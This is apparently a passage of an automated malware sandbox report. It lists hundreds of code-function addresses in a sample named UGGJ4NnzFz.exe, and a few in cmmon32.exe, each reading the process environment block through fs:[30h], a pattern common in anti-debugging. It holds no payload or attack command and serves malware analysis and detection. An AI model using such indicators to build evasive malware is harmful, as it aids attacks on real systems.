          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A1A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A43D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A51608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009A8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009D37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe Code function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
